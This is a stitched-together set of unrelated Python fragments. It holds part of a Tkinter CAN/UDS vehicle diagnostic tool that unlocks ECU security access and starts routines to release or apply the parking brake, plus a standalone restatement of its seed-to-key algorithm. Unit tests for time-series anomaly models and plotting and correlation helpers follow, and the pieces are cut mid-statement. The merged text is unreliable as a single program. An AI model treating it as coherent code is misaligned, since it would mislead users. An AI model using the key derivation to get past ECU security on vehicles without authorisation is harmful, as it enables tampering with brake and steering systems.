struct.pack('BBBB', (output_key_temp>>24)&0xFF, (output_key_temp>>16)&0xFF, (output_key_temp>>8)&0xFF, output_key_temp&0xFF) return output_key def getDateTimeBytes(self): """ get year/month/day and convert into bytes """ _year_high = int(str(datetime.datetime.now().year), 16) >> 8 _year_low = int(str(datetime.datetime.now().year), 16) & 0xFF _month = int(str(datetime.datetime.now().month), 16) _day = int(str(datetime.datetime.now().day), 16) _hour = int(str(datetime.datetime.now().hour), 16) _minute = int(str(datetime.datetime.now().minute), 16) _second = int(str(datetime.datetime.now().second), 16) return (_year_high, _year_low, _month, _day, _hour, _minute, _second) 
############################################################################### ### Event handers ############################################################################### def Form_OnClosing(self): if self._isOpen: self.btnDevCtrl.invoke() self.destroy() def BtnOpenDev_Click(self): if self._isOpen: #Close Channel if self._isChnOpen: self.btnCANCtrl.invoke() #Close Device self._zcan.CloseDevice(self._dev_handle) self.DevInfoClear() self.strvDevCtrl.set("打开") self.cmbDevType["state"] = "readonly" self.cmbDevIdx["state"] = "readonly" self._isOpen = False else: self._cur_dev_info = self._dev_info[self.cmbDevType.get()] #Open Device self._dev_handle = self._zcan.OpenDevice(self._cur_dev_info["dev_type"], self.cmbDevIdx.current(), 0) if self._dev_handle == INVALID_DEVICE_HANDLE: #Open failed messagebox.showerror(title="打开设备", message="打开设备失败!") return #Update Device Info Display self.DevInfoRead() self._is_canfd = self._cur_dev_info["chn_info"]["is_canfd"] self._res_support = self._cur_dev_info["chn_info"]["sf_res"] self.strvDevCtrl.set("关闭") self.cmbDevType["state"] = tk.DISABLED self.cmbDevIdx["state"] = tk.DISABLED self._isOpen = True self.ChnInfoUpdate(self._isOpen) self.ChnInfoDisplay(self._isOpen) def BtnOpenCAN_Click(self): if self._isChnOpen: #wait read_thread exit self._terminated = True #Close channel self._zcan.ResetCAN(self._can_handle) self.strvCANCtrl.set("打开") self._isChnOpen = False self.udsclient.close() else: #Initial channel if self._res_support: #resistance enable ip = self._zcan.GetIProperty(self._dev_handle) self._zcan.SetValue(ip, str(self.cmbCANChn.current()) + "/initenal_resistance", '1' if self.cmbResEnable.current() == 0 else '0') self._zcan.ReleaseIProperty(ip) #set usbcan-e-u baudrate if self._cur_dev_info["dev_type"] in USBCAN_XE_U_TYPE: ip = self._zcan.GetIProperty(self._dev_handle) self._zcan.SetValue(ip, str(self.cmbCANChn.current()) + "/baud_rate", self._cur_dev_info["chn_info"]["baudrate"][self.cmbBaudrate.get()]) self._zcan.ReleaseIProperty(ip) #set usbcanfd clock if self._cur_dev_info["dev_type"] in USBCANFD_TYPE: ip = self._zcan.GetIProperty(self._dev_handle) self._zcan.SetValue(ip, str(self.cmbCANChn.current()) + "/clock", "60000000") self._zcan.ReleaseIProperty(ip) chn_cfg = ZCAN_CHANNEL_INIT_CONFIG() chn_cfg.can_type = ZCAN_TYPE_CANFD if self._is_canfd else ZCAN_TYPE_CAN if self._is_canfd: chn_cfg.config.canfd.mode = self.cmbCANMode.current() chn_cfg.config.canfd.abit_timing = self._cur_dev_info["chn_info"]["baudrate"][self.cmbBaudrate.get()] chn_cfg.config.canfd.dbit_timing = self._cur_dev_info["chn_info"]["data_baudrate"][self.cmbDataBaudrate.get()] else: chn_cfg.config.can.mode = self.cmbCANMode.current() if self._cur_dev_info["dev_type"] in USBCAN_I_II_TYPE: brt = self._cur_dev_info["chn_info"]["baudrate"][self.cmbBaudrate.get()] chn_cfg.config.can.timing0 = brt["timing0"] chn_cfg.config.can.timing1 = brt["timing1"] chn_cfg.config.can.acc_code = 0 chn_cfg.config.can.acc_mask = 0xFFFFFFFF self._can_handle = self._zcan.InitCAN(self._dev_handle, self.cmbCANChn.current(), chn_cfg) if self._can_handle == INVALID_CHANNEL_HANDLE: messagebox.showerror(title="打开通道", message="初始化通道失败!") return ret = self._zcan.StartCAN(self._can_handle) if ret != ZCAN_STATUS_OK: messagebox.showerror(title="打开通道", message="打开通道失败!") return #start receive thread if self.cmbUDSEnable.get() == '是': self.udsclient.open() self._terminated = False else: pass self.strvCANCtrl.set("关闭") self._isChnOpen = True self.btnReadDTC["state"] = tk.NORMAL self.btnResetECU["state"] = 
tk.NORMAL self.btnClrDTC_1["state"] = tk.NORMAL self.btnReadSwVer["state"] = tk.NORMAL self.btnINSCali["state"] = tk.NORMAL self.btnC11Config["state"] = tk.NORMAL self.btnReleaseEPB["state"] = tk.NORMAL self.btnApplyEPB["state"] = tk.NORMAL self.btnAutoDiagTest["state"] = tk.NORMAL self.btnExportReport["state"] = tk.NORMAL self.btnClrReport["state"] = tk.NORMAL #self.btnSwFlash["state"] = tk.NORMAL self.btnCaliEPS2wd["state"] = tk.NORMAL self.btnCaliEPS4wd["state"] = tk.NORMAL self.btnDeCaliEPS4wd["state"] = tk.NORMAL self.ChnInfoDisplay(not self._isChnOpen) def onTabChange(self, event): #if self.gbDiag == self.tabesc: if event.widget.index("current") == 0: self.isotp_layer.set_address(self._isotpaddr_PHYS) print("INFO:Setting address ESP") #elif self.gbDiag == self.tabeps: elif event.widget.index("current") == 1: self.isotp_layer.set_address(self._isotpaddr_EPS) print("INFO:Setting address EPS") elif self.gbDiag == self.tabepb: pass def BtnReadDTC_Click(self): #self.udsclient.change_session(1) #try: response = self.udsclient.get_dtc_by_status_mask(9) self.MsgBox4Dtc(response.service_data.dtcs) #except: #messagebox.showerror(title="读取故障码", message="读取故障码失败!") def BtnClearDTC_Click(self): #self.udsclient.change_session(1) response = self.udsclient.clear_dtc(0xFFFFFF) if response.positive and self.DTCBox is not None: self.DTCBox.destroy() self.BtnReadDTC_Click() def BtnReadSwVer_Click(self): self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp = self.udsclient.read_data_by_identifier(0xF195) print(resp) def BtnResetECU_Click(self): self.udsclient.ecu_reset(1) def BtnINSCali_Click(self): self.udsclient.change_session(1) try: self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp_1 = self.udsclient.start_routine(routine_id = 0xF001) resp_2 = self.udsclient.start_routine(routine_id = 0xF002) if resp_1.positive & resp_2.positive: messagebox.showinfo(title='INS Calibration', message='INS标定成功!') except: messagebox.showerror(title="INS Calibration", message="INS标定失败!") def BtnC11Config_Click(self): self.udsclient.change_session(1) try: self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) #resp_2 = self.udsclient.write_data_by_identifier(did = 0xF190, value = 0x0F) resp_1 = self.udsclient.write_data_by_identifier(did = 0xF1A8, value = 0x0F) if resp_1.positive : messagebox.showinfo(title='Variant Confiuration', message='Confiure Success!') except: messagebox.showerror(title="Variant Confiuration", message="Confiure Failed!") def BtnReleaseEPB_Click(self): self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp_1 = self.udsclient.start_routine(routine_id = 0xF102) print(resp_1) def BtnApplyEPB_Click(self): self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp_1 = self.udsclient.start_routine(routine_id = 0xF105) print(resp_1) def BtnSelectSwPath_Click(self): self.swpath =
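SecAlgo() above derives the security-access key from the ECU seed; for level 0x01 the whole transform is a handful of bit operations on the 32-bit seed. A standalone restatement of just that branch is below; the example seed is made up, not captured from a real ECU.

```python
# Standalone restatement of the level-0x01 seed-to-key transform from
# SecAlgo() above; the example seed is made up, not captured from an ECU.
import struct

def level1_key(seed: bytes) -> bytes:
    temp = (seed[0] << 24) | (seed[1] << 16) | (seed[2] << 8) | seed[3]
    key = ((((temp >> 4) ^ temp) << 3) ^ temp) & 0xFFFFFFFF
    return struct.pack('>I', key)   # same byte order as the 'BBBB' pack used above

print(level1_key(bytes([0x12, 0x34, 0x56, 0x78])).hex())  # -> '8a8cce80' for this illustrative seed
```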
import unittest import pandas as pd import numpy as np from utils import prepare_data import models import random import scipy.signal from typing import List from analytic_types.segment import Segment class TestDataset(unittest.TestCase): def test_models_with_corrupted_dataframe(self): data = [[1523889000000 + i, float('nan')] for i in range(10)] dataframe = pd.DataFrame(data, columns=['timestamp', 'value']) segments = [] model_instances = [ models.JumpModel(), models.DropModel(), models.GeneralModel(), models.PeakModel(), models.TroughModel() ] for model in model_instances: model_name = model.__class__.__name__ model.state = model.get_state(None) with self.assertRaises(AssertionError): model.fit(dataframe, segments, 'test') def test_peak_antisegments(self): data_val = [1.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 1.0, 1.0, 5.0, 7.0, 5.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000003, 'to': 1523889000005, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.PeakModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_jump_antisegments(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 9.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000016, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.JumpModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_trough_antisegments(self): data_val = [9.0, 9.0, 9.0, 9.0, 7.0, 4.0, 7.0, 9.0, 9.0, 9.0, 5.0, 1.0, 5.0, 9.0, 9.0, 9.0, 9.0, 9.0, 9.0, 9.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000003, 'to': 1523889000005, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.TroughModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_drop_antisegments(self): data_val = [9.0, 9.0, 9.0, 9.0, 9.0, 5.0, 5.0, 5.0, 5.0, 9.0, 9.0, 9.0, 9.0, 1.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000016, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': False, 'deleted': 
True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.DropModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_general_antisegments(self): data_val = [1.0, 2.0, 1.0, 2.0, 5.0, 6.0, 3.0, 2.0, 1.0, 1.0, 8.0, 9.0, 8.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000003, 'to': 1523889000005, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.GeneralModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_jump_empty_segment(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 0, 0, 0, 0, 0, 0, 0, 0, 0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000019, 'to': 1523889000025, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.JumpModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_drop_empty_segment(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 0, 0, 0, 0, 0, 0, 0, 0, 0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000019, 'to': 1523889000025, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.DropModel() model.state = model.get_state(None) model_name = model.__class__.__name__ model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_value_error_dataset_input_should_have_multiple_elements(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 4.0, 5.0, 5.0, 6.0, 5.0, 1.0, 2.0, 3.0, 4.0, 5.0,3.0,3.0,2.0,7.0,8.0,9.0,8.0,7.0,6.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000007, 'to': 1523889000011, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.JumpModel() model.state = model.get_state(None) model_name = model.__class__.__name__ model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_prepare_data_for_nonetype(self): data = [[1523889000000, None], [1523889000001, None], [1523889000002, None]] try: data = prepare_data(data) except ValueError: self.fail('Model 
{} raised unexpectedly'.format(model_name)) def test_prepare_data_for_nan(self): data = [[1523889000000, np.nan], [1523889000001, np.nan], [1523889000002, np.nan]] try: data = prepare_data(data) except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_prepare_data_output_fon_nan(self): data_nan = [[1523889000000, np.nan], [1523889000001, np.nan], [1523889000002, np.nan]] data_none = [[1523889000000, None], [1523889000001, None], [1523889000002, None]] return_data_nan = prepare_data(data_nan) return_data_none = prepare_data(data_none) for item in return_data_nan.value: self.assertTrue(np.isnan(item)) for item in return_data_none.value: self.assertTrue(np.isnan(item)) def test_three_value_segment(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 2.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 2.0, 3.0, 4.0, 5.0, 4.0, 2.0, 1.0, 3.0, 4.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000004, 'to': 1523889000006, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model_instances = [ models.GeneralModel(), models.PeakModel(), ] try: for model in model_instances: model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_general_for_two_labeling(self): data_val = [1.0, 2.0, 5.0, 2.0, 1.0, 1.0, 3.0, 6.0, 4.0, 2.0, 1.0, 0, 0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000001, 'to': 1523889000003, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.GeneralModel() model.state = model.get_state(None) model.fit(dataframe, segments,'test') result = len(data_val) + 1 for _ in range(2): model.do_detect(dataframe) max_pattern_index = max(model.do_detect(dataframe)) self.assertLessEqual(max_pattern_index[0], result) def test_peak_model_for_cache(self): cache = { 'patternCenter': [1, 6], 'patternModel': [1, 4, 0], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'windowSize': 1, 'convDelMin': 0, 'convDelMax': 0, 'heightMax': 4, 'heightMin': 4, } data_val = [2.0, 5.0, 1.0, 1.0, 1.0, 2.0, 5.0, 1.0, 1.0, 2.0, 3.0, 7.0, 1.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.PeakModel() model.state = model.get_state(cache) result = model.fit(dataframe, segments, 'test') self.assertEqual(len(result.pattern_center), 3) def test_trough_model_for_cache(self): cache = { 'patternCenter': [2, 6], 'patternModel': [5, 0.5, 4], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'window_size': 1, 'convDelMin': 0, 'convDelMax': 0, } data_val = [5.0, 5.0, 1.0, 4.0, 5.0, 5.0, 0.0, 4.0, 5.0, 5.0, 6.0, 1.0, 5.0, 5.0, 5.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.TroughModel() model.state = model.get_state(cache) result = model.fit(dataframe, segments, 'test') 
self.assertEqual(len(result.pattern_center), 3) def test_jump_model_for_cache(self): cache = { 'patternCenter': [2, 6], 'patternModel': [5, 0.5, 4], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'window_size': 1, 'convDelMin': 0, 'convDelMax': 0, } data_val = [1.0, 1.0, 1.0, 4.0, 4.0, 0.0, 0.0, 5.0, 5.0, 0.0, 0.0, 4.0, 4.0, 4.0, 4.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 152388900009, 'to': 1523889000013, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.JumpModel() model.state = model.get_state(cache) result = model.fit(dataframe, segments, 'test') self.assertEqual(len(result.pattern_center), 3) def test_models_for_pattern_model_cache(self): cache = { 'patternCenter': [4, 12], 'patternModel': [], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'window_size': 2, 'convDelMin': 0, 'convDelMax': 0, } data_val = [5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 0, 0, 0, 0, 0, 0, 6.0, 6.0, 6.0, 1.0, 1.0, 1.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000019, 'to': 1523889000024, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.DropModel() model_name = model.__class__.__name__ model.state = model.get_state(cache) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_problem_data_for_random_model(self): problem_data = [2.0, 3.0, 3.0, 3.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0,
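# Hypothetical reconstruction (a minimal sketch, not shown in this excerpt) of the
# create_dataframe helper the tests above call repeatedly. It is inferred from the
# explicit construction in test_models_with_corrupted_dataframe and from the segment
# timestamps (1523889000000 + index); the project's actual helper may differ.
import pandas as pd

def create_dataframe(data_val):
    # Pair each value with a millisecond timestamp offset from the base used by the segments.
    data = [[1523889000000 + i, value] for i, value in enumerate(data_val)]
    return pd.DataFrame(data, columns=['timestamp', 'value'])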
num_plots: number of plots :param num_cols: number of columns to use in the subplot :param y_scale: the height of each plot. If `None`, the size of the whole figure equals the default `figsize` :param sharex: unify x-axis if True :param sharey: unify y-axis if True :param exclude_empty: whether to exclude plots of empty series """ if exclude_empty: non_empty_dict_ = { key: val for key, val in dict_.items() if not val.empty } if len(non_empty_dict_) < len(dict_): excluded_series = set(dict_).difference(non_empty_dict_) _LOG.warning("Excluded empty series: %s", excluded_series) dict_ = non_empty_dict_ num_plots = num_plots or len(dict_) if axes is None: # Create figure to accommodate plots. num_cols = num_cols or 2 _, axes = get_multiple_plots( num_plots=num_plots, num_cols=num_cols, y_scale=y_scale, sharex=sharex, sharey=sharey, ) else: dbg.dassert_eq(len(axes), num_plots) # Select first `num_plots` series in the dict and plot them. keys_to_draw = list(dict_.keys())[:num_plots] for i, key in enumerate(keys_to_draw): srs = dict_[key] srs.to_frame().plot(title=key, ax=axes[i]) def plot_histograms_and_lagged_scatterplot( srs: pd.Series, lag: int, oos_start: Optional[str] = None, nan_mode: Optional[str] = None, title: Optional[str] = None, figsize: Optional[Tuple] = None, hist_kwargs: Optional[Any] = None, scatter_kwargs: Optional[Any] = None, axes: Optional[List[mpl.axes.Axes]] = None, ) -> None: """ Plot histograms and scatterplot to test stationarity visually. Function plots histograms with density plot for 1st and 2nd part of the time series (splitted by oos_start if provided otherwise to two equal halves). If the timeseries is stationary, the histogram of the 1st part of the timeseries would be similar to the histogram of the 2nd part) and scatter-plot of time series observations versus their lagged values (x_t versus x_{t - lag}). If it is stationary the scatter-plot with its lagged values would resemble a circular cloud. :param axes: flat list of axes or `None` """ dbg.dassert(isinstance(srs, pd.Series), "Input must be Series") dbg.dassert_monotonic_index(srs, "Index must be monotonic") hist_kwargs = hist_kwargs or {} scatter_kwargs = scatter_kwargs or {} # Handle inf and nan. srs = srs.replace([-np.inf, np.inf], np.nan) nan_mode = nan_mode or "drop" srs = hdataf.apply_nan_mode(srs, mode=nan_mode) # Divide timeseries to two parts. oos_start = oos_start or srs.index.tolist()[len(srs) // 2] srs_first_part = srs[:oos_start] srs_second_part = srs[oos_start:] # Plot histograms. if axes is None: _, axes = get_multiple_plots(3, 2, y_scale=figsize[1] / 2) plt.suptitle(title or srs.name) sns.histplot( srs_first_part, ax=axes[0], kde=True, stat="probability", **hist_kwargs ) axes[0].set(xlabel=None, ylabel=None, title="Sample distribution split 1") sns.histplot( srs_second_part, ax=axes[1], kde=True, stat="probability", **hist_kwargs, ) axes[1].set(xlabel=None, ylabel=None, title="Sample distribution split 2") # Plot scatter plot. 
axes[2].scatter(srs, srs.shift(lag), **scatter_kwargs) axes[2].set(xlabel="Values", ylabel="Values with lag={}".format(lag)) axes[2].axis("equal") axes[2].set_title("Scatter-plot with lag={}".format(lag)) # ############################################################################# # Correlation-type plots # ############################################################################# def plot_heatmap( corr_df: pd.core.frame.DataFrame, mode: Optional[str] = None, annot: Union[bool, str] = "auto", figsize: Optional[Tuple[int, int]] = None, title: Optional[str] = None, vmin: float = -1.0, vmax: float = 1.0, ax: Optional[mpl.axes.Axes] = None, ) -> None: """ Plot a heatmap for a corr / cov df. :param corr_df: df to plot a heatmap :param mode: "heatmap_semitriangle", "heatmap" or "clustermap" :param annot: determines whether to use annotations :param figsize: if nothing specified, basic (20,5) used :param title: title for the plot :param vmin: minimum value to anchor the colormap :param vmax: maximum value to anchor the colormap :param ax: axes in which to draw the plot """ figsize = figsize or FIG_SIZE # Sanity check. if corr_df.empty: _LOG.warning("Can't plot heatmap for empty `corr_df`") return if corr_df.shape[0] > 20: _LOG.warning("The corr_df.shape[0]='%s' > 20", corr_df.shape[0]) figsize = (figsize[0], figsize[0]) if np.all(np.isnan(corr_df)): _LOG.warning( "Can't plot heatmap with only nans:\n%s", corr_df.to_string() ) return # if annot == "auto": annot = corr_df.shape[0] < 10 # Generate a custom diverging colormap. cmap = _get_heatmap_colormap() mode = mode or "heatmap" if mode in ("heatmap", "heatmap_semitriangle"): # Set up the matplotlib figure. if ax is None: _, ax = plt.subplots(figsize=figsize) mask = _get_heatmap_mask(corr_df, mode) sns.heatmap( corr_df, cmap=cmap, vmin=vmin, vmax=vmax, # Use correct aspect ratio. square=True, annot=annot, fmt=".2f", cbar_kws={ "shrink": 0.5, "location": "left", "use_gridspec": False, "pad": 0.03, }, mask=mask, ax=ax, ) ax.set_title(title) elif mode == "clustermap": dbg.dassert_is(ax, None) g = sns.clustermap( corr_df, cmap=cmap, vmin=vmin, vmax=vmax, square=True, annot=annot, figsize=figsize, ) g.ax_heatmap.set_title(title) return else: raise RuntimeError("Invalid mode='%s'" % mode) ax.tick_params(axis="y", labelright=True, labelleft=False, labelrotation=0) # TODO(gp): Add an option to mask out the correlation with low pvalues # http://stackoverflow.com/questions/24432101/correlation-coefficients-and-p-values-for-all-pairs-of-rows-of-a-matrix def plot_correlation_matrix( df: pd.core.frame.DataFrame, mode: Optional[str] = None, annot: Union[bool, str] = False, figsize: Optional[Tuple[int, int]] = None, title: Optional[str] = None, method: Optional[str] = None, min_periods: Optional[int] = None, ax: Optional[mpl.axes.Axes] = None, ) -> pd.core.frame.DataFrame: """ Compute correlation matrix and plot its heatmap. :param df: Df to compute correlation matrix and plot a heatmap :param mode: "heatmap_semitriangle", "heatmap" or "clustermap" :param annot: determines whether to use annotations :param figsize: if nothing specified, basic (20,5) used :param title: title for the plot :param method: "pearson", "kendall", "spearman" or callable method of correlation :param min_periods: minimum number of observations required per pair of columns to have a valid result; currently only available for Pearson and Spearman correlation """ if df.empty: _LOG.warning("Skipping correlation matrix since `df` is empty") return None # Compute the correlation matrix. 
method = method or "pearson" corr_df = df.corr(method=method, min_periods=min_periods) # Plot heatmap. plot_heatmap( corr_df, mode=mode, annot=annot, figsize=figsize, title=title, vmin=-1.0, vmax=1.0, ax=ax, ) return corr_df def display_corr_df(df: pd.core.frame.DataFrame) -> None: """ Display a correlation df with values with 2 decimal places. """ if df is not None: df_tmp = df.applymap(lambda x: "%.2f" % x) cexplo.display_df(df_tmp) else: _LOG.warning("Can't display correlation df since it is None") def compute_linkage(df: pd.DataFrame, method: Optional[str] = None) -> np.ndarray: """ Perform hierarchical clustering. Linkage methods available in the official documentation: https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html :param df: input dataframe with columns as series :method: distance calculation method :returns: hierarchical clustering encoded as a linkage matrix """ method = method or "average" corr = df.corr() return schier.linkage(corr, method=method) def select_series_to_keep(df_corr: pd.DataFrame, threshold: float) -> List[str]: """ Select correlate series to keep. Iterate through the correlation dataframe by picking the time series that has the largest number of coefficients above the correlation threshold. If there are multiple such time series, pick the first one i.e. with the min index. Next, take all the time series that have correlation above the threshold with the selected one and drop them from the correlation matrix. Continue the process on the remaining subset matrix until all of the time series in the remaining matrix have a correlation below the threshold. At this point, stop the process and return the list of time series in the remaining matrix. :param df_corr: dataframe with time series correlations :param threshold: correlation threshold to remove time series :returns: list of series to remove """ corr = df_corr.copy() # Fill diag with 0 to ensure that the correlations of time series with themselves # (i.e. 1.0) are not selected when coefficients compared to the threshold. np.fill_diagonal(corr.values, 0) while True: subset_corr = corr[abs(corr) > threshold] if subset_corr.isnull().values.all(): return list(subset_corr.columns.values) else: column_to_keep = ( subset_corr[abs(subset_corr) > threshold].notnull().sum().idxmax() ) columns_to_remove = subset_corr[ subset_corr[column_to_keep].notnull() ].index corr = subset_corr.drop(columns_to_remove).drop( columns_to_remove, axis=1 ) def cluster_and_select( df: pd.DataFrame, num_clust: int, corr_thr: float = 0.8, show_corr_plots: bool = True, show_dendogram: bool = True, method: Optional[str] = None, ) -> Optional[Dict[str, float]]: """ Select a subset of time series, using clustering and correlation approach. Cluster time series using hierarchical clustering algorithm defined by the linkage matrix. We use compute_linkage() function to compute linkage matrix with the default 'average' method (or the method specified in the input). Once the clusters are formed and each time series is assigned to a specific cluster, the correlations amongst time series produced for every such cluster. The correlation matrix is then passed to select_series_to_remove() method, which returns the list of highly correlated time series within the cluster (above the threshold specified) that are removed from the total list of time series to consider. 
Once the function has iterated over every cluster and removed the highly correlated members from the original list of time series, it returns the reduced list of time series, which carries roughly the same information and can be used for further analysis. The function also produces a dendrogram of the clustered time series.
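# Illustrative usage sketch (not part of the original module) of the correlation-threshold
# selection described above. The toy data is made up purely for illustration; note that
# select_series_to_keep(), as implemented above, returns the columns that survive the
# filtering (i.e. the ones to keep).
import pandas as pd

def _example_select_series_to_keep():
    df = pd.DataFrame(
        {
            "a": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
            "b": [3.0, 5.0, 7.0, 9.0, 11.0, 13.0],   # perfectly correlated with "a"
            "c": [1.0, -1.0, 2.0, -2.0, 3.0, -3.0],  # only weakly correlated with "a"
        }
    )
    corr = df.corr()
    kept = select_series_to_keep(corr, threshold=0.8)
    # "a" and "b" are correlated above the threshold, so one of them is dropped;
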